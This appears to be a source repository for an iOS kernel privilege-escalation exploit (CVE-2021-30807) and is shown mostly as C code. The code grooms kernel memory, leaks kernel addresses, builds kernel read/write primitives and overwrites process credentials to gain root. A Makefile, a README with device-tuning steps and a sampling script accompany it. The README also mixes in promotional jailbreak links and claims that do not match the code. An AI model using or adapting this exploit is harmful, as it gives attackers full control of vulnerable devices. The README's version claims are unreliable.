IOSurfaceRootUserClient + other 1006 | * pointers will correspond to this one */ 1007 | int mididx = iosruc_hole_fillers->len / 2; 1008 | int spray_surface_id = 0; 1009 | 1010 | struct iosruc_hole_filler *mid = iosruc_hole_fillers->items[mididx]; 1011 | 1012 | /* We don't want to trigger a reallocation from 0x10000 --> 1013 | * 0x20000 bytes */ 1014 | while(spray_surface_id < 8191){ 1015 | spray_surface_id = create_surface(mid->iosruc); 1016 | 1017 | if(spray_surface_id == -1) 1018 | break; 1019 | 1020 | array_insert(mid->surface_ids, (void *)(uintptr_t)spray_surface_id); 1021 | } 1022 | 1023 | *iosruc_hole_fillersp = iosruc_hole_fillers; 1024 | *pipe_hole_fillersp = pipe_hole_fillers; 1025 | *anchor_alloc_kaddrp = anchor_alloc_kaddr; 1026 | 1027 | return true; 1028 | } 1029 | 1030 | static bool exploit_stage2(struct array *iosruc_hole_fillers, 1031 | uint64_t *iosr_kaddrp, uint64_t *iosruc_kaddrp, 1032 | uint64_t *iosc_array_kaddrp, 1033 | uint32_t *iosc_array_capacityp){ 1034 | /* Here we will leak the address of some IOSurfaceRootUserClient 1035 | * and the address of its IOSurfaceClient array. We do this by 1036 | * picking one of the IOSurfaceClient pointers in mid's surface client 1037 | * array to increment. We increment it 0x70 bytes and so that its 1038 | * IOSurface pointer now points to the IOSurfaceRootUserClient of the 1039 | * IOSurfaceClient it overlaps with. Then we can leak fields of that 1040 | * user client pointer with s_get_bulk_attachments. 1041 | * 1042 | * We don't know if mid->inferred_client_array_kva *actually* 1043 | * corresponds to mid's IOSurfaceClient array, but it will correspond 1044 | * to one of the iosruc_hole_filler structures */ 1045 | 1046 | int mididx = iosruc_hole_fillers->len / 2; 1047 | struct iosruc_hole_filler *mid = iosruc_hole_fillers->items[mididx]; 1048 | 1049 | /* We allocated enough IOSurfaceClient objects so we should own all 1050 | * kalloc.160 elements for the pages near the end of the surface 1051 | * ID array. There's 102 elements per kalloc.160 page. Maybe we 1052 | * can get one that sits on the eigth-last page in its all_used list */ 1053 | int surface_idx = mid->surface_ids->len - (102 * 8); 1054 | int target_surface = (int)(uintptr_t)mid->surface_ids->items[surface_idx]; 1055 | 1056 | for(int i=1; ilen; i++){ 1057 | struct iosruc_hole_filler *ihf = iosruc_hole_fillers->items[i]; 1058 | 1059 | uint64_t current_client_array_guess = ihf->inferred_client_array_kva; 1060 | 1061 | /* We account for both KVA space layouts: 1062 | * [IOSurfaceClient array][pipe buffer][anchor alloc] 1063 | * and 1064 | * [pipe buffer][IOSurfaceClient array][anchor alloc] 1065 | */ 1066 | 1067 | uint64_t guessed_IOSurfaceClientp = current_client_array_guess + 1068 | (sizeof(void *) * target_surface); 1069 | 1070 | if(!increment32_n(guessed_IOSurfaceClientp, 0x70)){ 1071 | printf("%s: failed to increment guessed IOSurfaceClient" 1072 | " pointer at %#llx\n", __func__, 1073 | guessed_IOSurfaceClientp); 1074 | return false; 1075 | } 1076 | 1077 | /* Don't start doing this until we're more than a fourth of 1078 | * the way through the loop since we may hit an unmapped page 1079 | * before then */ 1080 | if(i > (iosruc_hole_fillers->len / 4)){ 1081 | if(!increment32_n(guessed_IOSurfaceClientp - 0x10000, 0x70)){ 1082 | printf("%s: failed to increment guessed IOSurfaceClient" 1083 | " pointer at %#llx\n", __func__, 1084 | guessed_IOSurfaceClientp); 1085 | return false; 1086 | } 1087 | } 1088 | } 1089 | 1090 | /* Leak the pointers we need */ 1091 | uint64_t bulk_in = (uint64_t)target_surface; 1092 | 1093 | uint8_t bulk_out[0x80]; 1094 | memset(bulk_out, 0, sizeof(bulk_out)); 1095 | size_t bulk_out_sz = sizeof(bulk_out); 1096 | 1097 | kern_return_t kret = IOConnectCallMethod(mid->iosruc, 28, &bulk_in, 1, 1098 | NULL, 0, NULL, 0, bulk_out, &bulk_out_sz); 1099 | 1100 | if(kret){ 1101 | printf("%s: s_get_bulk_attachments failed: %s\n", __func__, 1102 | mach_error_string(kret)); 1103 | return false; 1104 | } 1105 | 1106 | uint64_t iosr_kaddr = *(uint64_t *)(bulk_out + 0x1c); 1107 | uint64_t iosruc_kaddr = *(uint64_t *)(bulk_out + 0x3c) - 0xf8; 1108 | uint64_t iosc_array_kaddr = *(uint64_t *)(bulk_out + 0x54); 1109 | uint32_t iosc_array_capacity = *(uint32_t *)(bulk_out + 0x5c); 1110 | 1111 | *iosr_kaddrp = iosr_kaddr; 1112 | *iosruc_kaddrp = iosruc_kaddr; 1113 | *iosc_array_kaddrp = iosc_array_kaddr; 1114 | *iosc_array_capacityp = iosc_array_capacity; 1115 | 1116 | return true; 1117 | } 1118 | 1119 | static bool exploit_stage3(struct array *iosruc_hole_fillers, 1120 | struct array *pipe_hole_fillers, uint64_t anchor_alloc_kaddr, 1121 | uint64_t iosruc_kaddr, uint64_t iosc_array_kaddr, 1122 | uint32_t iosc_array_capacity, 1123 | struct pipe_hole_filler **krw_pipe_hole_fillerp, 1124 | io_connect_t *krw_iosrucp, int *krw_surface_idp){ 1125 | /* Create an artifical OOB IOSurfaceClient read with our 32-bit 1126 | * increment. But first we have to fix the IOSurfaceClient pointer 1127 | * in each pipe buffer now that we have a pointer to one of the 1128 | * IOSurfaceClient arrays we sprayed earlier */ 1129 | for(int i=0; ilen; i++){ 1130 | struct pipe_hole_filler *phf = pipe_hole_fillers->items[i]; 1131 | uint8_t contents[0x10000]; 1132 | 1133 | if(read(phf->rfd, contents, sizeof(contents)) == -1){ 1134 | printf("%s: failed to read pipe %d: %s\n", __func__, i, 1135 | strerror(errno)); 1136 | return false; 1137 | } 1138 | 1139 | /* This is very likely to point to pipe buffer we control */ 1140 | *(uint64_t *)contents = iosc_array_kaddr + 0x10000 + sizeof(uint64_t); 1141 | 1142 | uint8_t *fake_IOSurfaceClient = contents + sizeof(uint64_t); 1143 | 1144 | *(uint64_t *)(fake_IOSurfaceClient + 0x40) = 1145 | iosc_array_kaddr + 0x10000 + sizeof(uint64_t) + 0xa0; 1146 | 1147 | uint8_t *fake_IOSurface = fake_IOSurfaceClient + 0xa0; 1148 | 1149 | *(uint64_t *)(fake_IOSurface + 0xc0) = 1150 | (iosc_array_kaddr + 0x10000 + sizeof(uint64_t) + 0xa0 + 0x400) - 0x14; 1151 | 1152 | /* Use the use count to encode the index into the pipe hole fillers 1153 | * so we know which one controls this IOSurface */ 1154 | *(uint32_t *)(fake_IOSurface + 0x400) = (0x4141 << 16) | i; 1155 | 1156 | if(write(phf->wfd, contents, sizeof(contents)) == -1){ 1157 | printf("%s: failed to write pipe %d: %s\n", __func__, i, 1158 | strerror(errno)); 1159 | return false; 1160 | } 1161 | } 1162 | 1163 | uint32_t times = 8193 - iosc_array_capacity; 1164 | 1165 | if(!increment32_n(iosruc_kaddr + 0x120, times)){ 1166 | printf("%s: failed to increase array capacity\n", __func__); 1167 | return false; 1168 | } 1169 | 1170 | /* Figure out which IOSurfaceRootUserClient corresponds to the 1171 | * IOSurfaceClient array that we can now OOB read from */ 1172 | struct pipe_hole_filler *krw_pipe_hole_filler = NULL; 1173 | io_connect_t krw_iosruc = IO_OBJECT_NULL; 1174 | 1175 | for(int i=0; ilen; i++){ 1176 | struct iosruc_hole_filler *ihf = iosruc_hole_fillers->items[i]; 1177 | io_connect_t iosruc = ihf->iosruc; 1178 | 1179 | uint64_t in = 8192; 1180 | uint64_t val = 0; 1181 | uint32_t outcnt = 1; 1182 | 1183 | kern_return_t kret = IOConnectCallScalarMethod(iosruc, 16, &in, 1, 1184 | &val, &outcnt); 1185 | 1186 | if(kret) 1187 | continue; 1188 | 1189 | if(((uint32_t)val >> 16) == 0x4141){ 1190 | krw_pipe_hole_filler = pipe_hole_fillers->items[val & 0xff]; 1191 | krw_iosruc = iosruc; 1192 | /* printf("%s: found corrupted IOSurfaceRootUserClient handle %#x\n", */ 1193 | /* __func__, krw_iosruc); */ 1194 | break; 1195 | } 1196 | } 1197 | 1198 | if(!krw_iosruc){ 1199 | printf("%s: failed, did not find corrupted iosruc\n", __func__); 1200 | return false; 1201 | } 1202 | 1203 | *krw_pipe_hole_fillerp = krw_pipe_hole_filler; 1204 | *krw_iosrucp = krw_iosruc; 1205 | *krw_surface_idp = 8192; 1206 | 1207 | return true; 1208 | } 1209 | 1210 | /* Kernel read/write constants */ 1211 | static io_connect_t g_krw_iosruc = IO_OBJECT_NULL; 1212 | static int g_krw_surface_pipe_read = 0, g_krw_surface_pipe_write = 0; 1213 | static uint32_t g_krw_surface_id = 0; 1214 | 1215 | static bool init_krw(io_connect_t krw_iosruc, 1216 | int krw_surface_pipe_read, int krw_surface_pipe_write, 1217 | uint32_t krw_surface_id){ 1218 | g_krw_iosruc = krw_iosruc; 1219 | g_krw_surface_pipe_read = krw_surface_pipe_read; 1220 | g_krw_surface_pipe_write = krw_surface_pipe_write; 1221 | g_krw_surface_id = krw_surface_id; 1222 | 1223 | return true; 1224 | } 1225 | 1226 | static bool kread32(uint64_t kaddr, uint32_t *out){ 1227 | if(!g_krw_iosruc){ 1228 | printf("%s: init_krw not called yet\n", __func__); 1229 | return false; 1230 | } 1231 | 1232 | uint8_t contents[0x10000]; 1233 | 1234 | if(read(g_krw_surface_pipe_read, contents, sizeof(contents)) == -1){ 1235 | printf("%s: read fail: %s\n", __func__, strerror(errno)); 1236 | return false; 1237 | } 1238 | 1239 | *(uint64_t *)(contents + 0x8 + 0xa0 + 0xc0) = kaddr - 0x14; 1240 | 1241 | if(write(g_krw_surface_pipe_write, contents, sizeof(contents)) == -1){ 1242 | printf("%s: write fail: %s\n", __func__, strerror(errno)); 1243 | return false; 1244 | } 1245 | 1246 | uint64_t in = g_krw_surface_id; 1247 | uint64_t val = 0; 1248 | uint32_t outcnt = 1; 1249 | 1250 | kern_return_t kret = IOConnectCallScalarMethod(g_krw_iosruc, 16, &in, 1, 1251 | &val, &outcnt); 1252 | 1253 | if(kret){ 1254 | printf("%s: failed reading from %#llx: %s\n", __func__, 1255 | kaddr, mach_error_string(kret)); 1256 | return false; 1257 | } 1258 | 1259 | *out = (uint32_t)val; 1260 | 1261 | return true; 1262 | } 1263 | 1264 | static bool kread64(uint64_t kaddr, uint64_t *out){ 1265 | uint32_t low, high; 1266 | 1267 | if(!kread32(kaddr, &low)) 1268 | return false; 1269 | 1270 | if(!kread32(kaddr + sizeof(uint32_t), &high)) 1271 | return false; 1272 | 1273 | *out = ((uint64_t)high << 32) | low; 1274 | 1275 | return true; 1276 | } 1277 | 1278 | static bool kwrite32(uint64_t kaddr, uint32_t val){ 1279 | if(!g_krw_iosruc){ 1280 | printf("%s: init_krw not called yet\n", __func__); 1281 | return false; 1282 | } 1283 | 1284 | uint8_t contents[0x10000]; 1285 | 1286 | if(read(g_krw_surface_pipe_read, contents, sizeof(contents)) == -1){ 1287 | printf("%s: read fail: %s\n", __func__, strerror(errno)); 1288 | return false; 1289 | } 1290 | 1291 | *(uint32_t *)(contents + 0x8 + 0xa0 + 0xb0) = 1; 1292 | *(uint64_t *)(contents + 0x8 + 0xa0 + 0xc0) = kaddr - 0x98; 1293 | 1294 | if(write(g_krw_surface_pipe_write, contents, sizeof(contents)) == -1){ 1295 | printf("%s: write fail: %s\n", __func__, strerror(errno)); 1296 | return false; 1297 | } 1298 | 1299 | uint64_t ins[] = { g_krw_surface_id, 0, val }; 1300 | 1301 | kern_return_t kret = IOConnectCallScalarMethod(g_krw_iosruc, 31, 1302 | ins, 3, NULL, NULL); 1303 | 1304 | if(kret){ 1305 | printf("%s: failed writing to %#llx: %s\n", __func__, kaddr, 1306 | mach_error_string(kret)); 1307 | return false; 1308 | } 1309 | 1310 | return true; 1311 | } 1312 | 1313 | static bool kwrite64(uint64_t kaddr, uint64_t val){ 1314 | uint32_t low = (uint32_t)val; 1315 | uint32_t high = (uint32_t)(val >> 32); 1316 | 1317 | if(!kwrite32(kaddr, low)) 1318 | return false; 1319 | 1320 | if(!kwrite32(kaddr + sizeof(uint32_t), high)) 1321 | return false; 1322 | 1323 | return true; 1324 | } 1325 | 1326 | static bool post_exploit(uint64_t krw_iosruc_kaddr){ 1327 | uint64_t slid_iosruc_vtab; 1328 | 1329 | if(!kread64(krw_iosruc_kaddr, &slid_iosruc_vtab)){ 1330 | printf("%s: failed reading iosruc vtable\n", __func__); 1331 | return false; 1332 | } 1333 | 1334 | printf("%s: iosruc vtab is %#llx\n", __func__, slid_iosruc_vtab); 1335 | 1336 | slid_iosruc_vtab |= 0xffffff8000000000; 1337 | 1338 | /* XXX Don't have time to detect this automatically, manually set */ 1339 | bool is_new_style_kernel = true; 1340 | 1341 | uint64_t kslide, kernel_taskp; 1342 | 1343 | if(is_new_style_kernel){ 1344 | /* iPhone 8, 14.6 */ 1345 | kslide = slid_iosruc_vtab - 0xfffffff00789a388; 1346 | kernel_taskp = 0xfffffff007729030 + kslide; 1347 | } 1348 | else{ 1349 | /* iPhone SE (2016), 14.7 */ 1350 | kslide = slid_iosruc_vtab - 0xfffffff006e2fb10; 1351 | 1352 | uint64_t kernel_taskpp = slid_iosruc_vtab - 0x1980; 1353 | 1354 | if(!kread64(kernel_taskpp, &kernel_taskp)){ 1355 | printf("%s: old: failed reading kernel_task pointer\n", __func__); 1356 | return false; 1357 | } 1358 | } 1359 | 1360 | printf("%s: kernel slide is %#llx\n", __func__, kslide); 1361 | 1362 | uint64_t kernel_task; 1363 | 1364 | if(!kread64(kernel_taskp, &kernel_task)){ 1365 | printf("%s: failed reading kernel_task\n", __func__); 1366 | return false; 1367 | } 1368 | 1369 | kernel_task |= 0xffffff8000000000; 1370 | 1371 | printf("%s: kernel task struct is at %#llx\n", __func__, kernel_task); 1372 | 1373 | uint64_t kernel_proc; 1374 | 1375 | if(!kread64(kernel_task + 0x398, &kernel_proc)){ 1376 | printf("%s: failed reading kernel proc pointer\n", __func__); 1377 | return false; 1378 | } 1379 | 1380 | kernel_proc |= 0xffffff8000000000; 1381 | 1382 | printf("%s: kernel proc struct is at %#llx\n", __func__, kernel_proc); 1383 | 1384 | uint64_t curproc; 1385 | 1386 | if(!kread64(kernel_proc + 0x8, &curproc)){ 1387 | printf("%s: failed reading kernproc->le_prev\n", __func__); 1388 | return false; 1389 | } 1390 | 1391 | curproc |= 0xffffff8000000000; 1392 | 1393 | uint64_t myproc; 1394 | 1395 | pid_t pid, mypid = getpid(); 1396 | 1397 | do { 1398 | if(!kread32(curproc + 0x68, (uint32_t *)&pid)){ 1399 | printf("%s: fail reading pid for proc struct %#llx\n", 1400 | __func__, curproc); 1401 | return false; 1402 | } 1403 | 1404 | myproc = curproc; 1405 | 1406 | if(!kread64(curproc + 0x8, &curproc)){ 1407 | printf("%s: failed reading next proc\n", __func__); 1408 | return false; 1409 | } 1410 | 1411 | curproc |= 0xffffff8000000000; 1412 | } while (pid != mypid); 1413 | 1414 | printf("%s: my proc struct is at %#llx\n", __func__, myproc); 1415 | 1416 | uint64_t mytask; 1417 | 1418 | if(!kread64(myproc + 0x10, &mytask)){ 1419 | printf("%s: could not read my task struct\n", __func__); 1420 | return false; 1421 | } 1422 | 1423 | mytask |= 0xffffff8000000000; 1424 | 1425 | printf("%s: my task struct is at %#llx\n", __func__, mytask); 1426 | 1427 | uint64_t mycreds; 1428 | 1429 | if(!kread64(myproc + 0xf0, &mycreds)){ 1430 | printf("%s: could not read my creds struct\n", __func__); 1431 | return false; 1432 | } 1433 | 1434 | mycreds |= 0xffffff8000000000; 1435 | 1436 | printf("%s: my creds are at %#llx\n", __func__, mycreds); 1437 | 1438 | uid_t uid = getuid(); 1439 | gid_t gid = getgid(); 1440 | 1441 | printf("%s: before: uid = %d, gid = %d\n", __func__, uid, gid); 1442 | 1443 | if(!kwrite32(mycreds + 0x18, 0)){ 1444 | printf("%s: failed zeroing uid\n", __func__); 1445 | return false; 1446 | } 1447 | 1448 | if(!kwrite32(mycreds + 0x1c, 0)){ 1449 | printf("%s: failed zeroing ruid\n", __func__); 1450 | return false; 1451 | } 1452 | 1453 | if(!kwrite32(mycreds + 0x20, 0)){ 1454 | printf("%s: failed zeroing svuid\n", __func__); 1455 | return false; 1456 | } 1457 | 1458 | if(!kwrite32(mycreds + 0x68, 0)){ 1459 | printf("%s: failed zeroing rgid\n", __func__); 1460 | return false; 1461 | } 1462 | 1463 | if(!kwrite32(mycreds + 0x6c, 0)){ 1464 | printf("%s: failed zeroing svgid\n", __func__); 1465 | return false; 1466 | } 1467 | 1468 | uid = getuid(); 1469 | gid = getgid(); 1470 | 1471 | printf("%s: after: uid = %d, gid = %d\n", __func__, uid, gid); 1472 | 1473 | return true; 1474 | } 1475 | 1476 | static void exploit(void){ 1477 | uint64_t anchor_alloc_kaddr; 1478 | struct array *iosruc_hole_fillers; 1479 | struct array *pipe_hole_fillers; 1480 | 1481 | if(!exploit_stage1(&iosruc_hole_fillers, &pipe_hole_fillers, 1482 | &anchor_alloc_kaddr)){ 1483 | #ifdef SAMPLING_MEMORY 1484 | printf("%s: failed to sample kernel_map\n", __func__); 1485 | #else 1486 | printf("%s: failed to shape kva space\n", __func__); 1487 | #endif 1488 | return; 1489 | } 1490 | 1491 | #ifdef SAMPLING_MEMORY 1492 | return; 1493 | #endif 1494 | 1495 | printf("%s: Shaped KVA space\n", __func__); 1496 | 1497 | uint64_t iosr_kaddr, iosruc_kaddr, iosc_array_kaddr; 1498 | uint32_t iosc_array_capacity; 1499 | 1500 | if(!exploit_stage2(iosruc_hole_fillers, &iosr_kaddr, 1501 | &iosruc_kaddr, &iosc_array_kaddr, 1502 | &iosc_array_capacity)){ 1503 | printf("%s: stage2 failed, we will panic\n", __func__); 1504 | return; 1505 | } 1506 | 1507 | printf("%s: stage2 success\n", __func__); 1508 | 1509 | /* printf("%s: stage2 success\n" */ 1510 | /* "\tIOSurfaceRoot pointer: %#llx\n" */ 1511 | /* "\tIOSurfaceRootUserClient: %#llx\n" */ 1512 | /* "\t\tIOSurfaceClient array: %#llx\n" */ 1513 | /* "\t\tIOSurfaceClient array capacity: %d\n", */ 1514 | /* __func__, iosr_kaddr, iosruc_kaddr, iosc_array_kaddr, */ 1515 | /* iosc_array_capacity); */ 1516 | 1517 | struct pipe_hole_filler *krw_pipe_hole_filler; 1518 | io_connect_t krw_iosruc; 1519 | int krw_surface_id; 1520 | 1521 | if(!exploit_stage3(iosruc_hole_fillers, pipe_hole_fillers, 1522 | anchor_alloc_kaddr, iosruc_kaddr, iosc_array_kaddr, 1523 | iosc_array_capacity, &krw_pipe_hole_filler, 1524 | &krw_iosruc, &krw_surface_id)){ 1525 | printf("%s: stage3 failed, we will panic\n", __func__); 1526 | return; 1527 | } 1528 | 1529 | printf("%s: stage3 success\n", __func__); 1530 | 1531 | if(!init_krw(krw_iosruc, krw_pipe_hole_filler->rfd, 1532 | krw_pipe_hole_filler->wfd, krw_surface_id)){ 1533 | printf("%s: could not init kernel read/write prims\n", __func__); 1534 | return; 1535 | } 1536 | 1537 | printf("%s: kernel read/write prims set up\n" 1538 | " read kernel memory with kread32/64\n" 1539 | " write kernel memory with kwrite32/64\n", __func__); 1540 | 1541 | if(!post_exploit(iosruc_kaddr)){ 1542 | printf("%s: post exploit failed, we will panic\n", __func__); 1543 | return; 1544 | } 1545 | } 1546 | 1547 | static int increase_file_limit(void){ 1548 | struct rlimit rl = {0}; 1549 | 1550 | int err = getrlimit(RLIMIT_NOFILE, &rl); 1551 | 1552 | if(err){ 1553 | printf("%s: getrlimit: %s\n", __func__, strerror(errno)); 1554 | return err; 1555 | } 1556 | 1557 | rl.rlim_cur = OPEN_MAX; 1558 | rl.rlim_max = OPEN_MAX; 1559 | 1560 | err = setrlimit(RLIMIT_NOFILE, &rl); 1561 | 1562 | if(err){ 1563 | printf("%s: setrlimit: %s\n", __func__, strerror(errno)); 1564 | return err; 1565 | } 1566 | 1567 | return 0; 1568 | } 1569 | 1570 | int main(int argc, char **argv){ 1571 | if(increase_file_limit()){ 1572 | printf("Failed to increase file limits\n"); 1573 | return 1; 1574 | } 1575 | 1576 | struct utsname u; 1577 | uname(&u); 1578 | 1579 | printf("%s %s %s\n", u.release, u.version, u.machine); 1580 | 1581 | exploit(); 1582 | 1583 | for(;;); 1584 | return 0; 1585 | } 1586 | -------------------------------------------------------------------------------- /IOMobileFramebufferUserClient.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef IOMobileFramebufferUserClient_GUARD 3 | #define IOMobileFramebufferUserClient_GUARD 4 | 5 | void IOMobileFramebufferUserClient_tests(void); 6 | 7 | /* extern uint64_t g_mach_port_kaddr; */ 8 | extern void *g_test_port; 9 | extern bool g_dump_mqueue_logs; 10 | extern bool g_dump_peek_logs; 11 | extern bool g_log_queue_move_entry_gated; 12 | 13 | extern uint64_t g_right_port_kaddr; 14 | 15 | extern uint64_t g_osdata_kaddr; 16 | 17 | #endif 18 | 19 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Justin Sherman 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | SDK = $(shell xcrun --sdk iphoneos --show-sdk-path) 2 | CC = $(shell xcrun --sdk $(SDK) --find clang) 3 | CFLAGS = -g -arch arm64 -isysroot $(SDK) 4 | # make clang shut up about mach_port_destroy 5 | CFLAGS += -Wno-deprecated-declarations 6 | LDFLAGS = -framework CoreFoundation -framework IOKit 7 | 8 | ifeq ($(SAMPLING_MEMORY), 1) 9 | CFLAGS += -DSAMPLING_MEMORY 10 | endif 11 | 12 | #ios 15.4 check 13 | 14 | all : exploit 15 | 16 | array.o : array.c array.h 17 | $(CC) $(CFLAGS) array.c -c 18 | 19 | kernel_hooks.o : kernel_hooks.c kernel_hooks.h 20 | $(CC) $(CFLAGS) kernel_hooks.c -c 21 | 22 | exploit : array.o iokit.h kernel_hooks.o IOMobileFramebufferUserClient.c 23 | $(CC) $(CFLAGS) $(LDFLAGS) array.o kernel_hooks.o IOMobileFramebufferUserClient.c -o exploit 24 | ldid -Sent.xml ./exploit 25 | sshpass -p "iphone" rsync -sz -e 'ssh -p 2222' ./exploit ./ent.xml \ 26 | root@localhost:/var/root 27 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # iomfb Jailbreak Exploit for iOS 15.4 2 | 3 | Original Write up is here: [iomfb-exploit](https://jsherman212.github.io/2021/11/28/popping_ios14_with_iomfb.html) for [iOS 15.4 Jailbreak](https://taig9.com/jailbreak/ios-15-4/) 4 | 5 | Exploit for CVE-2021-30807. If you really want to build a jailbreak out 6 | of it, it will require tuning for your device and iOS version because I 7 | have no info leak to use for this. 8 | 9 | To tune for A11 and below, use pongo to load xnuspy and build with 10 | `SAMPLING_MEMORY=1 make -B`. This will enable a test that gathers 11 | the memory returned by `kernel_memory_allocate`, sorts those pointers, 12 | then spits out a range. You'll see something like this: 13 | 14 | ``` 15 | sample_kernel_map: 0xffffffe8ebe9c000 [0x10000 bytes from behind] 16 | sample_kernel_map: to add to alloc_averager: 17 | [0xffffffe8ce934000, 0xffffffe8ebf98000], 18 | ``` 19 | 20 | (just ignore the warnings it spits out) 21 | 22 | The test is meant to be ran 30 seconds after the device boots. 23 | 24 | Inside `alloc_averager.py` is a couple of samples I already ran for 25 | my phones. It takes the average of all the averages of each range. 26 | Create a "samples list" for your device and add the range to it. 27 | Repeat the test a couple times until you have 5-10 entries in that 28 | list. `alloc_averager.py` will report a success rate for the guess it 29 | generates based on the list. If you like the success rate, take the guess 30 | and replace the value for `GUESSED_OSDATA_BUFFER_PTR` at the top of 31 | `IOMobileFramebufferUserClient.c` with it. 32 | 33 | It is very important to not include outliers in this list. After running 34 | the test a couple times you'll likely run into a range that sticks 35 | out from the rest of the ranges you already have. 36 | 37 | You will need to find offsets for your device/version to run this test. 38 | 39 | First, to find `kernel_memory_allocate`, simply xref 40 | `kernel_memory_allocate: VM is not ready`. When you have the offset 41 | set `kma`'s value to it inside `install_kernel_memory_alloc_hook`. 42 | 43 | Second, to isolate the test from the other allocations XNU makes, 44 | I test for a specific return address. That address is inside 45 | `OSData::initWithCapacity`. You can easily find OSData's vtable 46 | by xrefing the string `"OSData"`. The first xref to that string 47 | will be in a function that has an xref to the vtable for OSData::MetaClass. 48 | Right above that vtable is OSData's vtable, and `OSData::initWithCapacity` 49 | is at `+0x78`. 50 | 51 | 52 | Once you have `OSData::initWithCapacity`, find the only `BL` to 53 | `kernel_memory_allocate` and take the offset of the instruction *right below 54 | it*. Inside `kernel_hooks.c`, use that offset in the only if statement 55 | in the only function in that file. 56 | 57 | A12+ will need to use something like Correlium for Unc0ver and Taurine 58 | 59 | ## Mofified for iOS 15.4 Beta 2 Support 60 | I just modified the source to support **iOS 15.4 Beta 2**. Please contact me on [epeth0mus](https://twitter.com/epeth0mus) for more details 61 | 62 | ## Flow Diagram 63 | ```mermaid 64 | graph LR 65 | A[iomfb-exploit] --> B{A12 or higher} -- Yes --> C(OK) 66 | B{A12 or higher} -- No --> D(Go with Checkra1n) 67 | ``` 68 | > **Note:** The **Jailbreak Now** button is disabled if your device is not supported. 69 | -------------------------------------------------------------------------------- /alloc_averager.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python3 2 | 3 | import statistics 4 | 5 | iphone8_kernel_map_samples = [ 6 | [0xffffffe8cee1c000, 0xffffffe8ec458000], 7 | [0xffffffe8cef78000, 0xffffffe8ec5b0000], 8 | [0xffffffe8ce9b4000, 0xffffffe8ebff4000], 9 | [0xffffffe8cef38000, 0xffffffe8ec570000], 10 | [0xffffffe8cead4000, 0xffffffe8ec10c000], 11 | [0xffffffe8ccdec000, 0xffffffe8ec378000], 12 | ] 13 | 14 | iphonese_kernel_map_samples = [ 15 | [0xfffffff9937e4000, 0xfffffff9aeedc000], 16 | [0xfffffff98352c000, 0xfffffff99ec24000], 17 | [0xfffffff981604000, 0xfffffff99ccfc000], 18 | [0xfffffff981a4c000, 0xfffffff99d144000], 19 | ] 20 | 21 | def average_allocs(alloc_list): 22 | ptr_mask = 0xffffffffffffc000 23 | avgs = list() 24 | 25 | for alloc_range in alloc_list: 26 | nallocs = 0 27 | total = 0 28 | npages = 0 29 | 30 | curpage = alloc_range[0] 31 | last = alloc_range[1] 32 | 33 | while curpage < last: 34 | total += curpage 35 | npages += 1 36 | curpage += 0x4000 37 | 38 | avg = (total // npages) & ptr_mask 39 | avgs.append(avg) 40 | 41 | # Page align down 42 | guess = int(statistics.mean(avgs)) & ptr_mask 43 | 44 | satisfied = 0 45 | not_satisfied = 0 46 | 47 | for alloc_range in alloc_list: 48 | first = alloc_range[0] 49 | last = alloc_range[1] 50 | 51 | if guess >= first and guess < last: 52 | satisfied += 1 53 | else: 54 | not_satisfied += 1 55 | 56 | right_chance = (satisfied / len(alloc_list)) * 100.0 57 | 58 | print("Guess 0x%x (%.02f%% chance (%d/%d) of being right)" % \ 59 | (guess, right_chance, satisfied, len(alloc_list))) 60 | 61 | return 62 | 63 | def main(): 64 | average_allocs(iphone8_kernel_map_samples) 65 | average_allocs(iphonese_kernel_map_samples) 66 | return 67 | 68 | main() 69 | -------------------------------------------------------------------------------- /array.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include "array.h" 6 | 7 | static const int STARTING_CAPACITY = 1; 8 | 9 | int array_bsearch(struct array *a, const void *key, 10 | int (*compar)(const void *, const void *), void **result){ 11 | if(!a){ 12 | *result = NULL; 13 | return ARRAY_NULL; 14 | } 15 | 16 | if(array_empty(a)){ 17 | *result = NULL; 18 | return ARRAY_OK; 19 | } 20 | 21 | *result = bsearch(key, a->items, a->len, sizeof(void *), compar); 22 | 23 | if(!(*result)) 24 | return ARRAY_KEY_NOT_FOUND; 25 | 26 | return ARRAY_OK; 27 | } 28 | 29 | int array_clear(struct array *a){ 30 | free(a->items); 31 | a->items = NULL; 32 | 33 | a->len = 0; 34 | a->capacity = STARTING_CAPACITY; 35 | 36 | return ARRAY_OK; 37 | } 38 | 39 | int array_destroy(struct array **a){ 40 | array_clear(*a); 41 | 42 | free(*a); 43 | *a = NULL; 44 | 45 | return ARRAY_OK; 46 | } 47 | 48 | int array_empty(struct array *a){ 49 | return !a || a->len == 0; 50 | } 51 | 52 | int array_insert(struct array *a, void *elem){ 53 | if(!a) 54 | return ARRAY_NULL; 55 | 56 | if(!a->items) 57 | a->items = malloc(a->capacity * sizeof(void *)); 58 | 59 | if(a->len >= a->capacity - 1){ 60 | a->capacity *= 2; 61 | 62 | void **items_rea = realloc(a->items, a->capacity * sizeof(void *)); 63 | a->items = items_rea; 64 | } 65 | 66 | a->items[a->len++] = elem; 67 | 68 | return ARRAY_OK; 69 | } 70 | 71 | int array_qsort(struct array *a, int (*compar)(const void *, const void *)){ 72 